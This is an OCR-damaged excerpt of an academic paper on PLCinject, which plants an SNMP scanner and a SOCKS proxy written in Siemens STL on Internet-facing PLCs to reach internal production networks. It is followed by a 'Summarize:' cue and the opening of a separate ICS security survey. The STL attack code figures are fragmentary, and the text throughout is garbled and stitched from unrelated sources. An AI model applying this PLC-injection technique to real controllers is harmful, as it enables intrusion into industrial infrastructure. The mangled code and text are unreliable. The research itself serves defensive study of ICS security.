90M72.1 90Q124.2 9OL20.0 L1 / FBI, 900B8 0 II (a) Original program. OB 1 / II CALL reset A AN A JNB CALL L1: NOP 0 I I ". FC666 registers 9OQ124.0 90M72 .1 9OQ124.2 90L20.0 /I Ll FBI, 900B8 I A A OPN A A A FB 1 9OI124.7 9OI124.6 Fe 666 OB666 900BX0.4 FB 1 90I124.7 90I124.6 (b) Patched program. The red blocks are added by PLCinject. Figure 7: Scheme of patching the PLCs program. ICON parameter once is not enough. The connection function will start to work when the #connect variable raises from o to 1 between two calls of the function. That is why we programmed a toggle function after the first appearance of the connect function (line 10 -11). This will change the 529 0001 get_ip : NOP 1 0002 0003 II read ip from system state list (SZL) 0004 CALL RDSYSST 0005 REQ SZL ID INDEX :=TRUE :=W#16#0037 :=W#16#0000 0006 0007 0008 0009 0010 0011 RET VA L :=#sysst_ret 0012 BUSY :=#syss t_busy SZL HEADER :="DB".szlheader.SZL HEADER DR :="DB".ip_info 0013 II wait until SZL read finish ed 0014 A #sysst_busy 0015 BEC 0016 0017 0018 SET S Figure 8: Get PLCs local IP #connect value from false to true after ICON has been called the first time in a cycle. The ICON function will detect a raising signal edge on its call in the next cycle and will then be executed. The next step is to send the UDP based SNMP packets and receive them. This will be done by calling the functions IUSEND and IURCV. After the SNMP scan has been completed all data will be stored in data block which can be downloaded by the attacker (step 3). B. SOCKS 5 Proxy Once the attacker has discovered all SNMP devices, in cluding the local PLCs, the next step is to connect to them. This can be accomplished by using the accessible PLC as a gateway into the local network. To achieve this we chose to implement a SOCKS 5 proxy on the PLC. This has two main reasons. At first the SOCKS protocol is quite lightweight and easy to implement. Furthermore all applications can use this Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 0020 II calc first ip of local network 0021 II L "DB".ip_info .local ip 0022 OPN "DB" 0023 L %DBD406 002 4 II L "DB".ip_info .subnet 0025 L %DBD410 0026 AD 0027 II T "DB".ADDRESS .rem ip addr 002 8 T %DBD64 002 9 0030 I I 0031 I I 0032 0033 get number of hosts from subnet L "DB" .ip_info .subnet L %DBD4 10 L DW#16#FFFFFFFF 0034 XOD 0035 T #num hosts Figure 9: Calculate the local nets first IP and the maximal number of hosts 0001 0002 0003 0004 0005 0006 0007 0008 0009 0010 0011 CALL TCON , "T CON DB SCAN" AN - - REQ :=#connec t ID :=1 DONE :=#con done - BUSY :=#con _busy ERROR :=#con error - STATUS :=#con status - CONNECT :="DB".TCON #connected #connect PAR -SCAN Figure 10: Setup a UDP connection kind of proxy, either they are SOCKS aware and thus can be configured to use one or you use a so-called proxifier to add SOCKS support to arbitrary programs. The SOCKS 5 protocol is defined in RFC 1928 [24]. An error-free TCP connection to a target through the proxy consists of the following steps: 1) The client connects via TCP to the SOCK S server and sends a list of supported authentication methods. 2) The server replies with one selected authentication method. 3) Depending on the selected authentication method the appropriate sub-negotiation is entered. 4) The client sends a connect request with the targets IP. 5) The server sets up the connection and replies. All subsequent packets are tunneled between client and target. 6) The client closes the TCP connection. Our implementation offers the minimal necessary function ality. It supports no authentication, so we can skip step 3. Also we do not support proper error handling. In the end only TCP connects with IPv4 addresses are supported. Once the client connected, we expect this message flow: 1) Client offers authentication methods: any mes sage, typically Ox05 <authcount-n> (1 byte) <authlist> (n bytes). 2) Server chooses authentication method: 0 x 0 5 0 x 00 (perform no authentication). 530 0002 0003 0004 0005 0006 0007 0008 0009 0010 0011 0005 0006 0007 0008 0009 0010 0011 0012 0013 0014 0015 0016 0017 0018 0019 JL lend JU bind II state JU ne goti ate II state JU authenticate II state JU connect_request II state JU connect II state JU connect confirm II state JU proxy II state JU reset II state lend: JU end Figure 11: Jump list for the states of SOCKS 5 CALL TRCV , "T RCV_cl ient_DB" A AN AN JC EN R :=TRUE ID :=W#16#000 1 LEN :=0 NDR :=#rcv ndr BUSY :=#rcv_busy ERROR :=#rcv error STATUS RCVD LEN - DAT A :="buffe rs" .rev #rcv ndr - #rcv_busy #rcv error - next state -0 1 2 3 4 5 6 7 Figure 12: Receive the clients authentication negotiation 3) Client wants to connect to target: OxO 5 OxO 1 OxO 0 OxOl <ip> (4bytes) <port> (2 bytes). 4) Server confirms connection: OxO 5 OxO 0 OxO 0 OxOl OxOO OxOO OxOO OxOO OxOO OxOO. 5) Client and target can now conununicate through the connection with the server. As previously mentioned, programs on the PLC are cyclically executed. This is why we use a simple state machine to handle the SOCKS protocol. Therefore we number each state and use a jump list to execute the corresponding code block, see figure 11. A state transition is achieved by incrementing the state number which is persisted in a data block. It follows a description of each state and its actions: bind -On first start the program has to bind and listen to SOCKS port 1080. This is accomplished by using the system function TCON in passive mode. We stay in this state until a partner is connecting to this port. negot i ate -We wait until the client sends any message. This is done with the function TRCV which is enabled with the EN_R argument, see figure 12. aut hent icat e -After the first message we send a reply which indicates the client to perform no authentication. For this purpose we use the TSEND system function. In contrast to TRCV this function is edge controlled which means the parameter REQ has to change from FALSE to TRUE between consecutive calls to activate sending. As shown in figure 13 we toggle a flag and call TSEND twice with a rising edge on REQ. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 0008 CALL TSEND , "TSEND client DB" - 0009 REQ :=#authent icate 0010 ID :=W#16#000 1 0011 LEN :=2 0012 DONE :=#sn d done 0013 BUSY :=#sn d_busy 0014 ERROR :=#sn d error 0015 STATUS .= 0016 DAT A :="buffe rs".snd 0017 0018 AN #authen ticate 0019 S #authen ticate 0020 JC authenticate 002 1 0022 A #snd done 002 3 AN #snd erro r 002 4 AN #snd_busy 002 5 JC next state - Figure 13: Respond with no authentication necessary connect_request -Then we expect the client to send a connection set up message containing target IP and port number which is stored for the next state. connect -We set up the connection to the target with TCON. connect_confirm -When the connection to the target is established, we send the confirmation message to the client. proxy -Now we simply tunnel the connections between client and target. All data received from the client with TRCV is stored in a buffer which is reused to feed the TSENO function for sending data to the client. The same principle applies to the opposite direction, but we have to consider that sending messages can take a couple of cycles. Therefore a second buffer is used to ensure that no messages are mixed or lost. A disconnect is signaled with the error flag of TRCV. When this occurs we will send the last received data and then we go to the next state. reset -In this state we close all connections with TO I SCON and reset all persisted flags to its initial values. V. EVA LUATION We analyzed the differences of the execution cycle times of the following scenarios: (a) a simple control program as a baseline, (b) its malicious version with the prepended SOCKS proxy in idle mode and (c) under load. Idle mode means that the proxy has been added to the control code but no proxy connection has been established. The Baseline program copies bytewise the input memory to the output memory 20 times which results in 81920 copy instructions. For the measurement, we added small code snippets which store the last cycle time in a data block. Siemens PLCs store the time of last execution cycle in a local variable of OBI called OBl_PREV_CYCLE. We measured 2046 cycles in each scenario. All three scenarios do not exhibit normal distributions. We used the Kruskal-Wallis and the Dunn's Multiple Comparison Test for statistical significance analysis. The results are shown in Figure 14. Execution time differed significantly in all three scenarios. Table II shows the mean 531 95 *** *** *** 1/1 E .S: 90 Q) E .. J!! (,) 85 >- (J 80 e . rltGj Figure 14: Shows the data distribution of the measured scan cycles for the three scenarios. Data are represented as box plots with mean and were analyzed with the use of the Kruskal- Wallis test and the Dunn's Multiple Comparison Test. Significant differences are shown in the graph (p < 0.0001 =***). All data were statistically analyzed with Prism software, version 5.0 (Graph Pad Inc). Table II: Statistical analysis of the three scenarios Mean Sdt. Deviation Sdt. Error Baseline (ms) Proxy idle (ms) Proxy under load (ms) 85.32 0.4927 0.01089 85.40 0.5003 0.01106 86.67 0.5239 0.01158 difference of the Baseline and the Proxy under load program, which is only 1.35 ms. The maximum transfer rate of the SOCKS proxy prepended to the Baseline program was about 40 KE/s. If the SOCKS proxy runs alone on the PLC it is able to transfer up to 730 KE/s. All network measurements have used a direct 100 Mbitls Ethernet connection to the PLC. Finally, we tested the described attack cycle in our laboratory. In addition to regular traffic, we verified that we were able to tunnel an exploit for the DoS vulnerability CVE-2015-2177 via the SOCKS tunnel using the tsocks library. The exploit worked as expected via the SOCKS tunnel. VI. DISCU SSION Our attacks have limitations. In order to ensure that the PLC is always responsive, the execution time of the main program is monitored by a watchdog which kills the main program if the execution time becomes too long. The additional SNMP Scanner or Proxy code that we upload, together with the original program, should not exceed the overall maximum execution time of 150 ms. An injection of the scanner or proxy is unlikely to trigger this timeout because the mean additional execution time of the proxy under load is 1.35 ms which is small compared to 150 ms. Furthermore, time-outs can be avoided by resetting the time counter after the execution of the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) injected program with the system function RE_TRIGR [21]. The easiest way to mitigate the described attack is to keep the PLC offline or to use a virtual private network instead. If this is not possible protection-level 3 should be activated on the Siemens PLC This enables a password-based read and write protection for the PLC Without the right password the attacker can not modify the PLCs program. Based on our experience, this feature is rarely used in practice. Another applicable protection mechanism would be a firewall with deep packet inspection which is aware of industrial control protocols and thus can block potential malicious accesses such as attempts to reprogram the PLC VII. CO NCLUSION We have shown a new threat vector that enables an external attacker to leverage a PLC as a SNMP scanner and network gateway to the internal production network. This makes it possible to access control systems behind an Internet-facing PLC Our measurements indicate that the attack code, which runs de facto parallel to the original control program, causes a statistically significant but negligible increase of the execution cycle time. This makes a service disruption of the PLC unlikely and increases the chances that an attack remains undetected. Prior work on scanning the Internet for ICS only adressed risks due to control systems that are connected to the Internet directly . Our investigation shows that risks assessments must take PLCs into account that are connected only indirectly to the Internet. As a consequence, the target set of Internet-reachable industrial control systems is probably larger than expected and includes the "deep" industrial control network. RE FERENCES [I] S. Heng, "Industry 4.0 upgrading of germany's industrial capabilities on the horizon:' Deutsche Bank Research, 2014. [2] NIST , "CVE-2014-2908," Apr. 2014. [Online]. Available: hups: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2014-2908 [3] --, "CVE-2014-2246," Mar. 2014. [Online]. Available: https: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2014-2246 [4] --, "CVE-2012-3037," May 20l2. [Online]. Available: hups: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2012-3037 [5] D. Beresford, "Exploiting Siemens Simatic S7 PLCs," Black Hat USA, 2011. [6] N. Cybersecurity and C. I. C. (NCC IC), "Ics-cert monitor," Sep. 2014. [7] Bundesamt fUr Sicherheit in der Informationstechnik, "Die Lage der IT-Sicherheit in Deutschland 2014," 2015. [8] Industrial Control Systems Cyber Emergency Response Team, "Alert (ICS-ALERT -l2-046-0 LA) Increasing Threat to Industrial Control Systems (Update A)," Available from ICS-CERT, ICS ALE RT-12-046-0lA., Oct. 20l2. [Online]. Available: hups: I lics- cert.us- cert.gov lalerts/ICS- ALERT- 12-046- 0 I A [9] J.-O. Malchow and J. Klick, Sicherheit in vernetzten Systemen: 21. DFN- Workshop. Paulsen, c., 2014, ch. Erreichbarkeit von digitalen Steuergeraten -ein Lagebild, pp. C2-CI9. [IO] B. Radvanovsky, "Project shine: 1,000,000 internet-connected scada and ics systems and counting," Tofino Security, 2013. [11] R. Langner. (2011) A time bomb with fourteen bytes. [Online]. Available: hUp:llwww.langner.comlen!20lll071 211a- ti me-bomb- with- fourteen- bytesl [12] B. Meixell and E. Forner, "Out of Control: Demonstrating SCADA Exploitation:' Black Hat USA, 2013. [13] S. E. McLaughlin, "On dynamic malware payloads aimed at pro grammable logic controllers." in HotSec, 20 II. 532 [14] S. McLaughlin and P. McDaniel, "Sabot: specification-based payload generation for programmable logic controllers," in Proceedings of the 2012 ACM coriference on Computer and communications security. ACM, 2012, pp. 439-449. [15] Wikipedia, "Automation Pyramid (content taken)." [Online]. Available: https:llde.wikipedia.org/wiki/Automatisierungspyramide [16] Siemens, "S7 314C- 2PN/DP Technical Details." [Online]. Available: https://support.industry.siemens.com /cs/pd/495261 ?pdti=td& pnid= 13754&lc=de- WW [17] -- , "S7-300 CPU 31xC and CPU 31x: Technical specifications." [Online]. Available: https:llcache.industry.siemens.com/dllfil es/906/12996906lau_70325/v II s7300_cpu_3 1xc_and_cpu_3 1 x_manuaCen- US_en-US.pdf [18] -- . (2011) S7-300 Instruction list S7-300 CPUs and ET 200 CPUs . [Online]. Available: https://cache.industry.siemens.com/dIlfiles/679/ 3 I 977679/atC8I 622/v lIs7300_parameter_manual_en- US_en- US.pdf [19] SNA P7, "S7 Protocol." [Online]. Available: http://snap7.sourceforge. netlsiemens_comm.html#s7 _protocol [20] J. Kiihner, "DotNe tSiemensPLCT oolBoxLibrary." [Online]. Available: https:llgithub.comljogibear9988/ DotN etSiemensPLCToolBoxLibrary [21] Siemens. (2006) System Software for S7-300/400 System and Standard Functions Volume 112. [Online]. Available: https:llcache.industry. siemens.com/dIlfiles/57 4/121457 4/atc 44504/v lISFC_e.pdf [22] D. Marzin, S. Lau, and J. Klick, "PLCinject Tool." [Online]. Available: https:llgit hub.comlSCADACS/P LCinject [23] J. Case, M. Fedor, M. Schoffstall, and J. Davin, "Simple Network Management Protocol (SN MP)," RFC 1157 (Historic), Internet Engineering Task Force, May 1990. [Online]. Available: http://www.ietf.orglrfc/rfcI157.txt [24] M. Leech, M. Ganis, Y. Lee, R. Kuris, D. Koblas, and L. Jones, "SOCKS Protocol Version 5," RFC 1928 (Proposed Standard), Internet Engineering Task Force, Mar. 1996. [Online]. Available: http://www.ietf.orglrfc/rfc 1928.txt Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply.
Summary:
Industrial control systems (ICS) are integral com ponents of production and control processes. Our modern infras tructure heavily relies on them. Unfortunately, from a security perspective, thousands of PLCs are deployed in an Internet-facing fashion. Security features are largely absent in PLCs. If they are present then they are often ignored or disabled because security is often at odds with operations. As a consequence, it is often possible to load arbitrary code onto an Internet-facing PLC. Besides being a grave problem in its own right, it is possible to leverage PLCs as network gateways into production networks and perhaps even the corporate IT network. In this paper, we analyze and discuss this threat vector and we demonstrate that exploiting it is feasible. For demonstration purposes, we developed a prototypical port scanner and a SOCKS proxy that runs in a PLC. The scanner and proxy are written in the PLC's native programming language, the Statement List (STL). Our implementation yields insights into what kinds of actions adversaries can perform easily and which actions are not easily implemented on a PLC.
|
Summarize:
KEYWORDS |Computer security; industrial control; networked control systems; power system security; SCADA systems; security I.INTRODUCTION Modern industrial control systems (ICSs) use informa- tion and communication technologies (ICTs) to controland automate stable operation of industrial processes [1], [2]. ICSs interconnect, monitor, and control pro- cesses in a variety of industries such as electric powergeneration, transmission and distribution, chemical pro-duction, oil and gas, refining and water desalination. Thesecurity of ICSs is receiving attention due to its increas-ing connections to the Internet [3]. ICS security vulnera-bilities can be attributed to several factors: use ofmicroprocessor-based controllers, adoption of communi- cation standards and protocols, and the complex distrib- uted network architectures. The security of ICSs hascome under particular scrutiny owing to attacks on criti-cal infrastructures [4], [5]. Traditional IT security solutions fail to address the coupling between the cyber and physical components ofan ICS [6]. According to NIST [1], ICSs differ from tradi-tional IT systems in the following ways. 1) The primary goal of ICSs is to maintain the integrity of the industrial process. 2) ICS processes are continuous and hence needto be highly available; unexpected outages for repair mustbe planned and scheduled. 3) In an ICS, interactions withphysical processes are central and often times complex.4) ICSs target specific industrial processes and may nothave resources for additional capabilities such as security.5) In ICSs, timely response to human reaction and physi- cal sensors is critical. 6) ICSs use proprietary communica- tion protocols to control field devices. 7) ICS componentsare replaced infrequently (15 20 years or longer). 8) ICScomponents are distributed and isolated and hence diffi-cult to physically access to repair and upgrade. A t t a c k so nI C S sa r eh a p p e n i n ga ta na l a r m i n gp a c e and the cost of these attacks is substantial for both gov-ernments and industries [7]. Cyberattacks against oil and gas infrastructure are estimated to cost the companies $1.87 billion by 2018 [8]. Until 2001, most of attacksoriginated internal to a company. Recently, attacks Manuscript received August 31, 2015; revised November 19, 2015; accepted December 19, 2015. Date of publication March 16, 2016; date of current versionApril 19, 2016. This work was supported in part by German Science Foundation as part of Project S2 within the CRC 1119 CROSSING; by the European Union s Seventh Framework Programme under Grant 609611, PRACTICE project; and by the Intel Collaborative Research Institute for Secure Computing (ICRI-SC). The NYU researchers were also supported in part by Consolidated Edison, Inc., under Award 4265141; by the U.S. Office of Naval Research under Award N00014-15-1-2182; and by the NYU Center for Cyber Security (New York and Abu Dhabi).S. McLaughlin is with KNOX Security, Samsung Research America, Mountain View, CA 94043 USA (e-mail: s.mclaughlin@samsung.com). C. Konstantinou ,X. Wang , and R. Karri are with the Polytechnic School of Engineering, New York University, Brooklyn, NY 11201 USA (e-mail: ckonstantinou@nyu.edu; rkarri@nyu.edu).L. Davi andA.-R. Sadeghi are with Technische Universit t Darmstadt, Darmstadt 64289, Germany (e-mail: lucas.davi@trust.cased.de; ahmad.sadeghi@ trust.cased.de). M. Maniatakos is with the Electrical and Computer Engineering Department, New York University Abu Dhabi, Abu Dhabi, UAE (e-mail: michail.maniatakos@ nyu.edu). Digital Object Identifier: 10.1109/JPROC.2015.2512235 0018-9219 2016 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1039Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. external to a company are becoming frequent. This is due to the use of commercial off-the-shelf (COTS) de-vices, open applications and operating systems, and in-creasing connection of the ICS to the Internet. In an effort to keep up with the cyberattacks, cyber- security researchers are inve stigating the attack surface and defenses for critical infrastructure domains such asthe smart grid [9], oil and gas [10], and water SCADA[11]. This survey will focus on the general ICS cybersecu-rity landscape by discussing attacks and defenses at vari-ous levels of abstraction in an ICS from the hardware tothe process. A. Industrial Control Systems The general architecture of an ICS is shown in Fig. 1. The main components of an ICS include the following. Programmable logic controller (PLC): A PLC is a digital computer used to automate industrial elec-tromechanical processes. PLCs control the stateof output devices based on the signals received from the sensors and the stored programs. PLCs operate in harsh environmental conditions, suchas excessive vibration and high noise [12]. PLCscontrol standalone equipment and discretemanufacturing processes. Distributed control system (DCS): DCS is an au- tomated control system in which the controlelements are distributed throughout the system [13]. The distributed controllers are networked to remotely monitor processes. The DCS can remainoperational even if a part of the control systemfails. DCSs are often found in continuous andbatch production processes which require ad-vanced control and communication with intelli-gent field devices. Supervisory control and data acquisition (SCA- DA): SCADA is a computer system used to moni- tor and control industrial processes. SCADAmonitors and controls field sites spread out overa geographically large area. SCADA systemsgather data in real time from remote locations.Supervisory decisions are then made to adjustcontrols. B. History of ICS Attacks In an ICS, the stable operation could be disrupted not only by an operator error or a failure at a productionunit, but also by a software error/bug, malware, or an in-tentional cyber criminal attack [14]. Just in 2014, theICS Cyber Emergency Response Team (ICS-CERT) re-sponded to 245 incidents. Numerous cyberattacks on ICS are summarized in Fig. 2. We elaborate on four ICS at- tacks that caused physical damages. In 2007, Idaho National Laboratory staged the Aurora attack, in order to demonstrate how a cyberattack coulddestroy physical components of the electric grid [15].The attacker gained the access to the control network ofa diesel generator. Then a malicious computer programwas run to rapidly open and close the circuit breakers of the generator, out of phase from the rest of the grid, re- sulting in an explosion of the diesel generator. Sincemost of the grid equipment us es legacy communications protocols that did not consider security, this vulnerabilityis especially a concern [16]. In 2008, a pipeline in Turkey was hit by a powerful explosion spilling over 30000 barrels of oil in an areaabove a water aquifer. Further, it cost British Petroleum $5 million a day in transit tariffs. The attackers entered the system by exploiting the vulnerabilities of the wire-less camera communication software, and then moveddeep into the internal network. The attackers tamperedwith the units used to alert the control room about mal-functions and leaks, and compromised PLCs at valve sta-tions to increase pressure in the pipeline causing theexplosion. In 2010, Stuxnet computer worm infected PLCs in 14 industrial sites in Iran, including an uranium enrich-ment plant [4], [17]. It was introduced to the target sys-tem via an infected USB flash drive. Stuxnet thenstealthily propagated through the network by infectingremovable drives, copying itself in the network sharedresources, and by exploiting unpatched vulnerabilities. Fig. 1. General structure of an ICS. The industrial process data collected at remote sites are sent by field devices such as remote terminal units (RTUs), intelligent electronic devices(IEDs), and programmable logic controller (PLCs), to the controlcenter through wired and wireless links. The control server allows clients to access data using standard protocols. The human machine interface (HMI) presents processed data to a human operator, by querying the time-stamped dataaccumulated in the data historian. The gathered data are analyzed, and control commands are sent to remote controllers. 1040 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. The infected computers were instructed to connect to an external command and control server. The central serverthen reprogrammed the PLCs to modify the operation ofthe centrifuges to tear themselves apart by the compro-mised PLCs [18]. In 2015, two hackers demonstrated a remote control of a vehicle [19]. The zero-day exploit gave the hackers wireless control of the vehicles. The software vulnerabil-ities in the vehicle entertainment system allowed thehackers to remotely control it, including dashboard func-tions, steering, brakes, and t ransmission, enabling mali- cious actions such as controlling the air conditioner andaudio, disabling the engine and the brakes, and comman- deering the wheel [20]. This is a harbinger of attacks in an automated manufacturing environment where intelli- gent robots cohabitate and coordinate with humans. C. Roadmap of This Paper Cybersecurity assessment can reveal the obvious and nonobvious physical implications of ICS vulnerabilitieson the target industrial processes. Cybersecurity assess-ment of ICSs for physical processes requires capturing the different layers of an ICS architecture. The chal- lenges of creating a vulnerability assessment methodol-ogy are discussed in Section II. Cybersecurity assessmentof an ICS requires the use of a testbed. The ICS testbedshould help identify cybersecurity vulnerabilities as wellas the ability of the ICS to withstand various types ofattacks that exploit these vulnerabilities. In addition,the testbed should ensure that critical areas of the ICS are given adequate attention. This way one can lessen the costs for fixing cybersecurity vulnerabilities emerg-ing from flaws in the design of ICS components and theICS network. ICS testbeds are discussed in Section II.Discussion on how one can construct attack vectors ap-pears in Section III. Attacks on ICSs have devastatingphysical consequences. Therefore, ICSs need to bedesigned for security robustness and tested prior to deployment. Control protocols should be fitted withsecurity features and policies. ICSs should be reinforcedby isolating critical operations by removing unnecessaryservices and applications from ICS components. Exten-sive discussion on vulnerability mitigation appears in Section IV, followed by final remarks in Section V. II.ICS VULNERABILITY ASSESSMENT In this section, we review the different layers in an ICS, the vulnerability assessment process outlining the cyber-security assessment strategy and discuss ICS testbeds foraccurate vulnerability analyses in a lab environment. A. The ICS Architecture and Vulnerabilities The different layers of ICS architecture are shown in Fig. 3. 1) Hardware Layer: Embedded components such as PLCs and RTUs are hardware modules executing software.Hardware attacks such as fault injection and backdoors can be introduced into these modules. These vulnerabil- ities in the hardware can be exploited by adversaries togain access to stored information or to deny services. The hardware-level vulnerabilities concern the entire lifecycle of an ICS from design to disposal. Security inthe processor supply chain is a major issue since hard-ware trojans can be injected in any stage of the supplychain introducing potential risks such as loss of reliabil- ity and security [21], [22]. Unauthorized users can use JTAG ports used for in-circuit test to steal intellec-tual property, modify firmware, and reverse engineerlogic [23] [25]. Peripherals introduce vulnerabilities.For example, malicious USB drives can redirect commu-nications by changing DNS settings or destroy the cir-cuit board [26], [27]. Expansion cards, memory units,Fig. 2. Timeline of cyberattacks on ICS and their physical impacts. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1041McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. and communication ports pose a security threat as well [28] [30]. 2) Firmware Layer: The firmware resides between the hardware and software. It includes data and instructionsable to control the hardware. The functionality of firm-ware ranges from booting the hardware providing run-time services to loading an operating system (OS). Due tothe real-time constraints related to the operation of ICSs, firmware-driven systems typically adopt a real-time oper-ating system (RTOS) such as VxWorks. In any case, vul- nerabilities within the fir mware could be exploited by adversaries to abnormally affect the ICS process. A recentstudy exploited vulnerabilities in a wireless access pointand a recloser controller firmware [31]. Malicious firm-ware can be distributed from a central system in an Fig. 3. Layered ICS architecture and the vulnerable components in the ICS stack. 1042 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. advanced metering infrastructure (AMI) to smart meters [32]. Clearly, that vulnerabilities in firmware can be used to launch DoS attacks to disrupt the ICS operation. 3) Software Layer: ICSs employ a variety of software platforms and applications, and vulnerabilities in thesoftware base may range from simple coding errors topoor implementation of access control mechanisms. Ac-cording to ICS-CERT, the highest percentage of vulnera- b i l i t i e si nI C Sp r o d u c t si si m p r o p e ri n p u tv a l i d a t i o nb y ICS software, also known as the buffer overflow vulnera-bility [33]. Poor management of credentials and authen-tication weaknesses are second and third, respectively.These vulnerabilities in the implementation of softwareinterfaces (e.g., HMI) and server configurations mayhave fatal consequences on the control functionality ofan ICS. For instance, a proprietary industrial automation software for historian servers had a heap buffer overflow vulnerability that could potentially lead to a Stuxnet-typeattack [34]. Sophisticated malware often incorporate both hard- ware and software. WebGL vulnerabilities are an exampleof hardware-enabled software attacks: access to graphicsGPU hardware by a least-privileged remote party resultsi nt h ee x p o s u r eo fG P Um e m o r yc o n t e n t sf r o mp r e v i o u s workloads [35]. The implementation of the software layer in a HIL testbed should reflect how each added compo-nent to the ICS increases the attack surface. 4) Network Layer: Vulnerabilities can be introduced into the ICS network in diffe rent ways [1]: a) firewalls (that protect devices on a network by monitoring andcontrolling communication packets using filtering poli- cies); b) modems (that convert between serial digital data and a signal suitable for transmission over a tele-phone line to allow devices to communicate); c) fieldbusnetwork (that links sensors and other devices to a PLC or other controller); d) communications systems androuters (that transfer messages between two networks);e) remote access points (that remotely configure ICS andaccess process data); and f) protocols and control net- work (that connect the supervisory control level to lower level control modules). DCS and SCADA servers, com-municating with lower level control devices, often arenot configured properly and not patched systematicallyand hence are vulnerable to emerging threats [36]. When designing a network architecture for an ICS, one should separate the ICS network from the corporatenetwork. In case the networks must be connected, only minimal connections should be allowed and the connec- tion must be through a firewall and a DMZ. 5) Process Layer: All the aforementioned ICS layers in- teract to implement the target ICS processes. The ob-served dynamic behavior of the ICS processes mustfollow the dynamic process characteristics based on thedesigned ICS model [37]. ICS process-centric attacks may inject spurious/incorrect information (through spe-cially crafted messages) to degrade performance or tohamper the efficiency of the controlled process [33].Process-centric attacks may also disturb the process state(e.g., crash or halt) by modifying runtime process vari-ables or the control logic. These attacks can deny serviceor change the industrial process without operator knowl- edge. Therefore, it is imperative to determine if varia- tions in the system process are nominal consequences ofan expected operation or signal an anomaly/attack.Process-centric/process-aw are vulnerability analysis can contribute to practices that enable ICS processes to func-tion in a secure manner. The vulnerabilities related tothe information flow (e.g., dependencies on hardware/software/network equipment with a single point of failure) must be determined. The HIL testbed should properly emulate the target process, in order to effec-tively assess and mitigate process-centric attacks [38]. B. ICS Vulnerability Assessment Fig. 4 presents the steps in the security assessment p r o c e s sw h o s ea i mi st oi d e n t i f ys e c u r i t yw e a k n e s s e sa n dpotential risks in ICSs. Due to the real-world conse-quences of ICS, security assessment of ICSs must ac-count for all possible operating conditions of each ICS component. Additionally, since ICS equipment can be more fragile than standard IT systems, the security as-sessment should take into consi deration the sensitive ICS dependencies and connectivity [39]. 1) Document Analysis: The first step in assessing any ICS is to characterize the different parts of its architec-ture. This includes gathering and analyzing information in order to understand the behavior of each ICS com- ponent. For example, analyzing the features of IEDsused in power systems such as a relay controller en-tails collecting information about its communication,Fig. 4. Security assessment of ICS. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1043McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. functionality, default configuration passwords, and sup- ported protocols [40]. 2) Mission and Asset Prioritization: Prioritizing the mis- sions and assets of the ICS is the next step in security as-sessment. Resources must be allocated based on thepurpose and sensitivity of each function. Demilitarizedzones (DMZs), for instance, can be used to add a layerof security to the ICS network by isolating the ICS andcorporate networks [41]. Selecting DMZs is an importanttask in this phase. 3) Vulnerability Extrapolation: Next the ICS should be examined for security vulnerabilities, to identify sourcesof vulnerability, and to establish attack vectors [42]. De-sign weaknesses and security vulnerabilities in criticalauthentication, application and communication securitycomponents should be investigated. The attack vectorsshould comprehensively explain the targeted components and the attack technique. 4) Assessment Environment: Depending on the type of industry and level of abstraction, assessment actionsmust be defined [37]. For example, in case when onlysoftware is used, the test vectors should address as manyphysical and cyber characteristics of the ICS as possible.By modeling and simulating individual ICS modules, the behavior of the system is emulated with regards to how the ICS and its internal functions react. Due to the complexity and real-time requirements of ICSs, hardware-in-the-loop (HIL) simulation is more effi-cient to test system resiliency against the developed at-tack vectors [43]. HIL simulation adds the ICScomplexity to the assessment platform by adding thecontrol system in a loop, as shown in Fig. 5(b). To capture the system dynamics, the physical process is replaced with a simulated plant, including sensors,actuators, and machinery. A well-designed HIL simula- tor will mimic the actual process behavior as closely as possible. A detailed discussion of developing an as-sessment environment appears in Section II-C. 5) Testing and Impact: The ICS will be tested on the testbed to demonstrate the outcomes of the attacks in-cluding the potential effect on the physical componentsof the ICS [44]. In addition, the system-level response and the consequences to the overall network can be ob- served. The results can be used to assess the impact of acyberattack on the ICS. 6) Vulnerability Remediation: Any weaknesses discov- ered in the previous steps should be carefully mitigated.This may involve working with vendors [45] and updat-ing network policies [46]. If there is no practical mitiga- tion strategy to address a vulnerability, guidelines should be developed to allow sufficient time to effectively re-solve the issue. 7) Validation Testing: The mitigation actions designed to resolve security issues must then be tested. A criticalpart of this step is to reexa mine the ICS and identify weaknesses. 8) Monitoring: Implementing all the previous steps is half the battle. Continuous monitoring and reassessingthe ICS to maintain security is important [47]. Intrusiondetection systems 